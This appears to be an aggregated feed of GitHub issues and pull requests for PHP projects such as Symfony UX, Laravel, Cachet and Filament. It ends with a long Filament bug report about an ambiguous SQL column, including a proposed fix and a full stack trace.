  • Exposed this option in component metadata as push_history_state.
  • Added LiveComponentMetadata::hasPushHistoryStateEnabled() to read the flag.
  • Updated LiveUrlSubscriber to include a new response header:
    • X-Live-Url-Push-History-State: 1|0
  • Updated frontend BackendResponse to parse the new header.
  • Updated frontend URL update logic to choose:
    • history.pushState(...) when enabled
    • history.replaceState(...) otherwise (current behavior preserved)
View more
2 comments 👍 1
ajgarlag

ajgarlag

19th May 2026 @ 06:51

Would it be possible to extend MaskBuilder to support more than 32 permission masks? Or are there any limitations? I know that acl_entries table has 'mask' defined as INT(11) but I can change it to bigint but don't know if this has any effect on acl?

View more
👍 2
slertt

slertt

24th Jan 2018 @ 13:36

This updates the Composer autoload hook to copy LARAVEL_INSTALLER_DEFER_HOOKS from $_ENV or $_SERVER into the process environment when getenv() cannot see it.

That lets later @php artisan ... Composer scripts inherit the deferred installer flag and avoid prompting during starter kit installs on platforms where Composer exposes the value through PHP superglobals.

Fixes #60253.

Tests:

  • vendor/bin/phpunit tests/Foundation/FoundationComposerScriptsTest.php
  • vendor/bin/pint --test src/Illuminate/Foundation/ComposerScripts.php tests/Foundation/FoundationComposerScriptsTest.php
View more
sawirricardo

sawirricardo

23rd Jun 2026 @ 14:57

Documentation Status: Needs Review Feature
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues
License MIT

symfony/ux-editor adds a single Symfony form field (EditorType) on top of multiple content-authoring editors — WYSIWYG, block and page-builder — behind one consistent API.

The core package is editor-agnostic and provides:

  • a polymorphic content model: EditorContentInterface with HtmlContent, BlockContent and PageContent, plus an EditorContentFormat enum;
  • EditorType form abstraction with data transformers;
  • Doctrine custom types (editor_html, editor_blocks, editor_page);
  • a signed upload pipeline (EditorUploadController, SignedUploadUrlGenerator, EditorUploadHandlerInterface, local handler + registry);
  • a ux_editor_render Twig function (HTML sanitized, blocks via registry, page rendered in a sandboxed iframe);
  • a LiveEditor trait for debounced autosave with LiveComponent;
  • a debug:ux-editor console command and a WebProfiler data collector.

Concrete editors plug in through BridgeInterface + BridgeRegistry. This PR also includes three bridges as separate composer + npm sub-packages:

  • symfony/ux-editor-ckeditor — CKEditor 5 (WYSIWYG family)
  • symfony/ux-editor-editorjs — EditorJS (block family)
  • symfony/ux-editor-grapesjs — GrapesJS (page-builder family)

PHP and JS test suites are included and passing. Documentation lives in src/Editor/doc/.

View more
1 comment ❤️ 3 🚀 3 👀 2
makraz

makraz

20th Jun 2026 @ 16:29

The SlackRecord used by the Slack and SlackWebhook handlers has a constructor parameter to exclude certain fields from being sent to Slack. This is a great way to log exceptions but not have them clutter up your Slack channels, for example. Currently, the configuration for the bundle doesn't have a key for this field, which means it can't be configured.

There's been a PR open (#402 by @Gwemox), but for some reason it's just been sitting there, gathering dust for some two years. It'd be great if someone could either merge it, or, in case that's not an option, offer some guidance on What To Do to get it in a mergable state.

View more
doenietzomoeilijk

doenietzomoeilijk

15th May 2023 @ 18:04

Hi,

In order to deploy this in a production environment I'm required to specify a schema, I sadly didn't see how... Is this possibility simply not available via env variables ?

Thanks !

View more
SirSirae

SirSirae

6th Nov 2020 @ 15:29

View more
2 comments
Kocal

Kocal

4th Apr 2026 @ 06:09

Hi team, I trying to start cachet in docker, I'm getting the following error when I finish setup:

2021/07/13 18:49:48 [error] 73#73: *4 FastCGI sent in stderr: "PHP message: [2021-07-13 18:49:48] production.ERROR: ErrorException: count(): Parameter must be an array or an object that implements Countable in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1161
cachet_1    | Stack trace:
cachet_1    | #0 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(2, 'count(): Parame...', '/var/www/html/v...', 1161, Array)
cachet_1    | #1 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1161): count(NULL)
cachet_1    | #2 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(1192): Illuminate\Database\Eloquent\Builder->callScope(Object(Closure))
cachet_1    | #3 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(314): Illuminate\Database\Eloquent\Builder->applyScopes()
cachet_1    | #4 /var/www/html/app/Http/Controllers/Dashboard/DashboardController.php(79): Illuminate\Database\Eloquent\Builder->get()
cachet_1    | #5 [internal function]: CachetHQ\Cachet\Http\Controllers\Dashboard\DashboardController" while reading response header from upstream, client: 172.23.0.1, server: localhost, request: "GET /dashboard HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "localhost:8000", referrer: "http://localhost:8000/setup"

Cachet version v2.3.18 Can you help me please, thanks

View more
1 comment
esteban1983cl

esteban1983cl

13th Jul 2021 @ 18:55

dependencies javascript

Bumps vite and laravel-vite-plugin. These dependencies needed to be updated together. Updates vite from 6.4.2 to 8.1.3

Updates laravel-vite-plugin from 1.3.0 to 3.1.0

import { defineConfig } from 'vite'; import laravel from 'laravel-vite-plugin';

export default defineConfig({ plugins: [ laravel({ input: ['resources/css/app.css', 'resources/js/app.js'], refresh: true,

  •       assets: [
    
  •           'resources/images/**',
    
  •           'resources/favicons/**',
    
  •       ],
      }),
    
    ], });
View more
dependabot[bot]

dependabot[bot]

19th Jun 2026 @ 03:06

good first issue filament

On the record update for an active incident, there needs to be a tie to the component to be update the current component status.

Image

View more
glipschitz

glipschitz

19th Jan 2025 @ 03:05

When trying to install Cachet version 3 on Ubuntu 24.04 I am getting the following error as Ubuntu are only shipping PHP version 8.3

Is there a method we can use to install this on Ubuntu 24.04?

View more
rosskoukkcl

rosskoukkcl

11th May 2026 @ 13:47

Fixes #50

TODO:

  • Actually silence the logs in each test where it's needed
View more
1 comment
weaverryan

weaverryan

9th May 2020 @ 18:36

Status: Needs Review

Fixes #22223

View more
1 comment
lacatoire

lacatoire

8th Apr 2026 @ 09:23

Cachet v3.x-dev installed on Debian 12 following the instructions in the documentation and served by Caddy.

This problem also occurs in the demo system.


If an incident is created with any status other than "Fixed", and is then updated to "Fixed", the status page shows the correct information.

If an incident is created with any status other than "Fixed" and is then updated to any status other than "Fixed" and is then updated to "Fixed", the status page still shows "Some systems are experiencing issues." even if all the components are in the correct working state. The only way to fix this appears to be to either delete the incident or delete all the updates other than the "Fixed" one.

Image

View more
4 comments
NABarnes

NABarnes

12th Mar 2025 @ 10:54

bug unconfirmed medium priority

Package

filament/forms

Package Version

v5.6.8

Laravel Version

v13.19.0

Livewire Version

v4.3.3

PHP Version

PHP 8.5.6

Problem description

When saving a form with a MorphToSelect, if the selected Type's modifyOptionsQueryUsing is defined and the query is modified with a join (for example, through orderByLeftPowerJoins()), the following error will be thrown during validation:

SQLSTATE[HY000]: General error: 1 ambiguous column name: id

This is due to how Type defines getOptionLabel() in its setUp method, in particular when a where clause is added to the query:

#vendor/filament/forms/src/Components/MorphToSelect/Type.php::179
$query->where($query->getModel()->getKeyName(), $value);

The fix should be as simple as using the qualified key name instead:

--- a/packages/forms/src/Components/MorphToSelect/Type.php
+++ b/packages/forms/src/Components/MorphToSelect/Type.php
@@ -176,7 +176,7 @@ class Type
         $this->getOptionLabelUsing(function (Select $component, $value) {
             $query = $this->getModel()::query();
 
-            $query->where($query->getModel()->getKeyName(), $value);
+            $query->where($query->getModel()->getQualifiedKeyName(), $value);
 
             if ($this->modifyOptionsQueryUsing) {
                 $query = $component->evaluate($this->modifyOptionsQueryUsing, [

Expected behavior

The validation would succeed and the record would be created. This kind of code/configuration used to be possible on version 3.x - I know that because I found this behaviour while upgrading a 3.x app to 5.x.

Steps to reproduce

Follow the README in the reproduction repository

Reproduction repository (issue will be closed if this is not valid)

https://github.com/gp-lnuff/filament-issue/tree/morphtoselect-validation

Relevant log output

[2026-07-14 10:38:12] local.ERROR: SQLSTATE[HY000]: General error: 1 ambiguous column name: id (Connection: sqlite, Database: /app/database/database.sqlite, SQL: select "bars".* from "bars" left join "foos" on "bars"."foo_id" = "foos"."id" where "id" = 5 order by "foos"."description" asc, "description" asc limit 1) {"userId":1,"exception":"[object] (Illuminate\\Database\\QueryException(code: HY000): SQLSTATE[HY000]: General error: 1 ambiguous column name: id (Connection: sqlite, Database: /app/database/database.sqlite, SQL: select \"bars\".* from \"bars\" left join \"foos\" on \"bars\".\"foo_id\" = \"foos\".\"id\" where \"id\" = 5 order by \"foos\".\"description\" asc, \"description\" asc limit 1) at /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php:857)
[stacktrace]
#0 /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php(813): Illuminate\\Database\\Connection->runQueryCallback('select \"bars\".*...', Array, Object(Closure))
#1 /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php(426): Illuminate\\Database\\Connection->run('select \"bars\".*...', Array, Object(Closure))
#2 /app/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php(3573): Illuminate\\Database\\Connection->select('select \"bars\".*...', Array, true, Array)
#3 /app/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php(3557): Illuminate\\Database\\Query\\Builder->runSelect()
#4 /app/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(908): Illuminate\\Database\\Query\\Builder->get(Array)
#5 /app/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(890): Illuminate\\Database\\Eloquent\\Builder->getModels(Array)
#6 /app/vendor/laravel/framework/src/Illuminate/Database/Concerns/BuildsQueries.php(366): Illuminate\\Database\\Eloquent\\Builder->get(Array)
#7 /app/vendor/filament/forms/src/Components/MorphToSelect/Type.php(187): Illuminate\\Database\\Eloquent\\Builder->first()
#8 /app/vendor/filament/support/src/Concerns/EvaluatesClosures.php(36): Filament\\Forms\\Components\\MorphToSelect\\Type->{closure:Filament\\Forms\\Components\\MorphToSelect\\Type::setUp():176}(Object(Filament\\Forms\\Components\\Select), 5)
#9 /app/vendor/filament/forms/src/Components/MorphToSelect.php(121): Filament\\Support\\Components\\Component->evaluate(Object(Closure), Array)
#10 /app/vendor/filament/support/src/Concerns/EvaluatesClosures.php(36): Filament\\Forms\\Components\\MorphToSelect->{closure:{closure:Filament\\Forms\\Components\\MorphToSelect::setUp():74}:121}(Object(Filament\\Forms\\Components\\Select), Object(Filament\\Schemas\\Components\\Utilities\\Get), 5)
#11 /app/vendor/filament/forms/src/Components/Select.php(599): Filament\\Support\\Components\\Component->evaluate(Object(Closure), Array)
#12 /app/vendor/filament/forms/src/Components/Select.php(1788): Filament\\Forms\\Components\\Select->getOptionLabel(false)
#13 /app/vendor/filament/forms/src/Components/Concerns/CanBeValidated.php(810): Filament\\Forms\\Components\\Select->getInValidationRuleValues()
#14 /app/vendor/filament/forms/src/Components/Concerns/CanBeValidated.php(854): Filament\\Forms\\Components\\Field->getInValidationRule()
#15 /app/vendor/filament/forms/src/Components/Concerns/CanBeValidated.php(910): Filament\\Forms\\Components\\Field->getValidationRules()
#16 /app/vendor/filament/schemas/src/Concerns/CanBeValidated.php(85): Filament\\Forms\\Components\\Field->dehydrateValidationRules(Array)
#17 /app/vendor/filament/schemas/src/Concerns/CanBeValidated.php(95): Filament\\Schemas\\Schema->getValidationRules()
#18 /app/vendor/filament/schemas/src/Concerns/CanBeValidated.php(115): Filament\\Schemas\\Schema->getValidationRules()
#19 /app/vendor/filament/schemas/src/Concerns/HasState.php(450): Filament\\Schemas\\Schema->validate()
#20 /app/vendor/filament/schemas/src/Components/Concerns/CanBeHidden.php(270): Filament\\Schemas\\Schema->{closure:Filament\\Schemas\\Concerns\\HasState::getState():449}()
#21 /app/vendor/filament/schemas/src/Concerns/HasState.php(449): Filament\\Schemas\\Components\\Component::withVisibilityCache(Object(Closure))
#22 /app/vendor/filament/filament/src/Resources/Pages/EditRecord.php(168): Filament\\Schemas\\Schema->getState(true, Object(Closure))
#23 /app/vendor/laravel/framework/src/Illuminate/Container/BoundMethod.php(36): Filament\\Resources\\Pages\\EditRecord->save(true, true)
#24 /app/vendor/laravel/framework/src/Illuminate/Container/Util.php(43): Illuminate\\Container\\BoundMethod::{closure:Illuminate\\Container\\BoundMethod::call():35}()
#25 /app/vendor/laravel/framework/src/Illuminate/Container/BoundMethod.php(96): Illuminate\\Container\\Util::unwrapIfClosure(Object(Closure))
#26 /app/vendor/laravel/framework/src/Illuminate/Container/BoundMethod.php(35): Illuminate\\Container\\BoundMethod::callBoundMethod(Object(Illuminate\\Foundation\\Application), Array, Object(Closure))
#27 /app/vendor/livewire/livewire/src/Wrapped.php(23): Illuminate\\Container\\BoundMethod::call(Object(Illuminate\\Foundation\\Application), Array, Array)
#28 /app/vendor/livewire/livewire/src/Mechanisms/HandleComponents/HandleComponents.php(708): Livewire\\Wrapped->__call('save', Array)
#29 /app/vendor/livewire/livewire/src/Mechanisms/HandleComponents/HandleComponents.php(242): Livewire\\Mechanisms\\HandleComponents\\HandleComponents->callMethods(Object(App\\Filament\\Resources\\Morphables\\Pages\\EditMorphable), Array, Object(Livewire\\Mechanisms\\HandleComponents\\ComponentContext))
#30 /app/vendor/livewire/livewire/src/LivewireManager.php(131): Livewire\\Mechanisms\\HandleComponents\\HandleComponents->update(Array, Array, Array)
#31 /app/vendor/livewire/livewire/src/Mechanisms/HandleRequests/HandleRequests.php(205): Livewire\\LivewireManager->update(Array, Array, Array)
#32 /app/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php(46): Livewire\\Mechanisms\\HandleRequests\\HandleRequests->handleUpdate()
#33 /app/vendor/laravel/framework/src/Illuminate/Routing/Route.php(275): Illuminate\\Routing\\ControllerDispatcher->dispatch(Object(Illuminate\\Routing\\Route), Object(Livewire\\Mechanisms\\HandleRequests\\HandleRequests), 'handleUpdate')
#34 /app/vendor/laravel/framework/src/Illuminate/Routing/Route.php(215): Illuminate\\Routing\\Route->runController()
#35 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(822): Illuminate\\Routing\\Route->run()
#36 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(180): Illuminate\\Routing\\Router->{closure:Illuminate\\Routing\\Router::runRouteWithinStack():821}(Object(Illuminate\\Http\\Request))
#37 /app/vendor/livewire/livewire/src/Mechanisms/HandleRequests/RequireLivewireHeaders.php(19): Illuminate\\Pipeline\\Pipeline->{closure:Illuminate\\Pipeline\\Pipeline::prepareDestination():178}(Object(Illuminate\\Http\\Request))
#38 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Livewire\\Mechanisms\\HandleRequests\\RequireLivewireHeaders->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#39 /app/vendor/laravel/framework/src/Illuminate/Routing/Middleware/SubstituteBindings.php(52): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#40 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Routing\\Middleware\\SubstituteBindings->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#41 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestForgery.php(104): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#42 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\PreventRequestForgery->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#43 /app/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php(48): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#44 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\View\\Middleware\\ShareErrorsFromSession->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#45 /app/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php(120): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#46 /app/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php(63): Illuminate\\Session\\Middleware\\StartSession->handleStatefulRequest(Object(Illuminate\\Http\\Request), Object(Illuminate\\Session\\Store), Object(Closure))
#47 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Session\\Middleware\\StartSession->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#48 /app/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php(36): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#49 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Cookie\\Middleware\\AddQueuedCookiesToResponse->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#50 /app/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php(74): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#51 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Cookie\\Middleware\\EncryptCookies->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#52 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(137): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#53 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(821): Illuminate\\Pipeline\\Pipeline->then(Object(Closure))
#54 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(800): Illuminate\\Routing\\Router->runRouteWithinStack(Object(Illuminate\\Routing\\Route), Object(Illuminate\\Http\\Request))
#55 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(764): Illuminate\\Routing\\Router->runRoute(Object(Illuminate\\Http\\Request), Object(Illuminate\\Routing\\Route))
#56 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(753): Illuminate\\Routing\\Router->dispatchToRoute(Object(Illuminate\\Http\\Request))
#57 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(200): Illuminate\\Routing\\Router->dispatch(Object(Illuminate\\Http\\Request))
#58 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(180): Illuminate\\Foundation\\Http\\Kernel->{closure:Illuminate\\Foundation\\Http\\Kernel::dispatchToRouter():197}(Object(Illuminate\\Http\\Request))
#59 /app/vendor/livewire/livewire/src/Features/SupportDisablingBackButtonCache/DisableBackButtonCacheMiddleware.php(19): Illuminate\\Pipeline\\Pipeline->{closure:Illuminate\\Pipeline\\Pipeline::prepareDestination():178}(Object(Illuminate\\Http\\Request))
#60 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Livewire\\Features\\SupportDisablingBackButtonCache\\DisableBackButtonCacheMiddleware->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#61 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ConvertEmptyStringsToNull.php(27): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#62 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\ConvertEmptyStringsToNull->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#63 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TrimStrings.php(47): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#64 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\TrimStrings->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#65 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/ValidatePostSize.php(27): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#66 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\ValidatePostSize->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#67 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestsDuringMaintenance.php(109): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#68 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\PreventRequestsDuringMaintenance->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#69 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/HandleCors.php(61): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#70 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\HandleCors->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#71 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/TrustProxies.php(58): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#72 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\TrustProxies->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#73 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/InvokeDeferredCallbacks.php(22): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#74 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Foundation\\Http\\Middleware\\InvokeDeferredCallbacks->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#75 /app/vendor/laravel/framework/src/Illuminate/Http/Middleware/ValidatePathEncoding.php(28): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#76 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(219): Illuminate\\Http\\Middleware\\ValidatePathEncoding->handle(Object(Illuminate\\Http\\Request), Object(Closure))
#77 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(137): Illuminate\\Pipeline\\Pipeline->{closure:{closure:Illuminate\\Pipeline\\Pipeline::carry():194}:195}(Object(Illuminate\\Http\\Request))
#78 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(175): Illuminate\\Pipeline\\Pipeline->then(Object(Closure))
#79 /app/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(144): Illuminate\\Foundation\\Http\\Kernel->sendRequestThroughRouter(Object(Illuminate\\Http\\Request))
#80 /app/vendor/laravel/framework/src/Illuminate/Foundation/Application.php(1220): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#81 /app/public/index.php(20): Illuminate\\Foundation\\Application->handleRequest(Object(Illuminate\\Http\\Request))
#82 {main}

[previous exception] [object] (PDOException(code: HY000): SQLSTATE[HY000]: General error: 1 ambiguous column name: id at /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php:435)
[stacktrace]
#0 /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php(435): PDO->prepare('select \"bars\".*...')
#1 /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php(846): Illuminate\\Database\\Connection->{closure:Illuminate\\Database\\Connection::select():426}('select \"bars\".*...', Array)
#2 /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php(813): Illuminate\\Database\\Connection->runQueryCallback('select \"bars\".*...', Array, Object(Closure))
#3 /app/vendor/laravel/framework/src/Illuminate/Database/Connection.php(426): Illuminate\\Database\\Connection->run('select \"bars\".*...', Array, Object(Closure))
#4 /app/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php(3573): Illuminate\\Database\\Connection->select('select \"bars\".*...', Array, true, Array)
#5 /app/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php(3557): Illuminate\\Database\\Query\\Builder->runSelect()
#6 /app/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(908): Illuminate\\Database\\Query\\Builder->get(Array)
#7 /app/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php(890): Illuminate\\Database\\Eloquent\\Builder->getModels(Array)
#8 /app/vendor/laravel/framework/src/Illuminate/Database/Concerns/BuildsQueries.php(366): Illuminate\\Database\\Eloquent\\Builder->get(Array)
#9 /app/vendor/filament/forms/src/Components/MorphToSelect/Type.php(187): Illuminate\\Database\\Eloquent\\Builder->first()
#10 /app/vendor/filament/support/src/Concerns/EvaluatesClosures.php(36): Filament\\Forms\\Components\\MorphToSelect\\Type->{closure:Filament\\Forms\\Components\\MorphToSelect\\Type::setUp():176}(Object(Filament\\Forms\\Components\\Select), 5)
#11 /app/vendor/filament/forms/src/Components/MorphToSelect.php(121): Filament\\Support\\Components\\Component->evaluate(Object(Closure), Array)
#12 /app/vendor/filament/support/src/Concerns/EvaluatesClosures.php(36): Filament\\Forms\\Components\\MorphToSelect->{closure:{closure:Filament\\Forms\\Components\\MorphToSelect::setUp():74}:121}(Object(Filament\\Forms\\Components\\Select), Object(Filament\\Schemas\\Components\\Utilities\\Get), 5)
#13 /app/vendor/filament/forms/src/Components/Select.php(599): Filament\\Support\\Components\\Component->evaluate(Object(Closure), Array)
#14 /app/vendor/filament/forms/src/Components/Select.php(1788): Filament\\Forms\\Components\\Select->getOptionLabel(false)
#15 /app/vendor/filament/forms/src/Components/Concerns/CanBeValidated.php(810): Filament\\Forms\\Components\\Select->getInValidationRuleValues()
#16 /app/vendor/filament/forms/src/Components/Concerns/CanBeValidated.php(854): Filament\\Forms\\Components\\Field->getInValidationRule()
#17 /app/vendor/filament/forms/src/Components/Concerns/CanBeValidated.php(910): Filament\\Forms\\Components\\Field->getValidationRules()
#18 /app/vendor/filament/schemas/src/Concerns/CanBeValidated.php(85): Filament\\Forms\\Components\\Field->dehydrateValidationRules(Array)
#19 /app/vendor/filament/schemas/src/Concerns/CanBeValidated.php(95): Filament\\Schemas\\Schema->getValidationRules()
#20 /app/vendor/filament/schemas/src/Concerns/CanBeValidated.php(115): Filament\\Schemas\\Schema->getValidationRules()
#21 /app/vendor/filament/schemas/src/Concerns/HasState.php(450): Filament\\Schemas\\Schema->validate()
#22 /app/vendor/filament/schemas/src/Components/Concerns/CanBeHidden.php(270): Filament\\Schemas\\Schema->{closure:Filament\\Schemas\\Concerns\\HasState::getState():449}()
#23 /app/vendor/filament/schemas/src/Concerns/HasState.php(449): Filament\\Schemas\\Components\\Component::withVisibilityCache(Object(Closure))
#24 /app/vendor/filament/filament/src/Resources/Pages/EditRecord.php(168): Filament\\Schemas\\Schema->getState(true, Object(Closure))
#25 /app/vendor/laravel/framework/src/Illuminate/Container/BoundMethod.php(36): Filament\\Resources\\Pages\\EditRecord->save(true, true)
#26 /app/vendor/laravel/framework/src/Illuminate/Container/Util.php(43): Illuminate\\Container\\BoundMethod::{closure:Illuminate\\Container\\BoundMethod::call():35}()
#27 /app/vendor/laravel/framework/src/Illuminate/Container/BoundMethod.php(96): Illuminate\\Container\\Util::unwrapIfClosure(Object(Closure))
#28 /app/vendor/laravel/framework/src/Illuminate/Container/BoundMethod.php(35): Illuminate\\Container\\BoundMethod::callBoundMethod(Object(Illuminate\\Foundation\\Application), Array, Object(Closure))
#29 /app/vendor/livewire/livewire/src/Wrapped.php(23): Illuminate\\Container\\BoundMethod::call(Object(Illuminate\\Foundation\\Application), Array, Array)
#30 /app/vendor/livewire/livewire/src/Mechanisms/HandleComponents/HandleComponents.php(708): Livewire\\Wrapped->__call('save', Array)
#31 /app/vendor/livewire/livewire/src/Mechanisms/HandleComponents/HandleComponents.php(242): Livewire\\Mechanisms\\HandleComponents\\HandleComponents->callMethods(Object(App\\Filament\\Resources\\Morphables\\Pages\\EditMorphable), Array, Object(Livewire\\Mechanisms\\HandleComponents\\ComponentContext))
#32 /app/vendor/livewire/livewire/src/LivewireManager.php(131): Livewire\\Mechanisms\\HandleComponents\\HandleComponents->update(Array, Array, Array)
#33 /app/vendor/livewire/livewire/src/Mechanisms/HandleRequests/HandleRequests.php(205): Livewire\\LivewireManager->update(Array, Array, Array)
#34 /app/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php(46): Livewire\\Mechanisms\\HandleRequests\\HandleRequests->handleUpdate()
#35 /app/vendor/laravel/framework/src/Illuminate/Routing/Route.php(275): Illuminate\\Routing\\ControllerDispatcher->dispatch(Object(Illuminate\\Routing\\Route), Object(Livewire\\Mechanisms\\HandleRequests\\HandleRequests), 'handleUpdate')
#36 /app/vendor/laravel/framework/src/Illuminate/Routing/Route.php(215): Illuminate\\Routing\\Route->runController()
#37 /app/vendor/laravel/framework/src/Illuminate/Routing/Router.php(822): Illuminate\\Routing\\Route->run()
#38 /app/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(180): Illuminate\\Routing\\Router->{closure:Illuminate\\Routing\\Router::runRouteWithinStack():821}(Object(Illuminate\\Http\\Request))
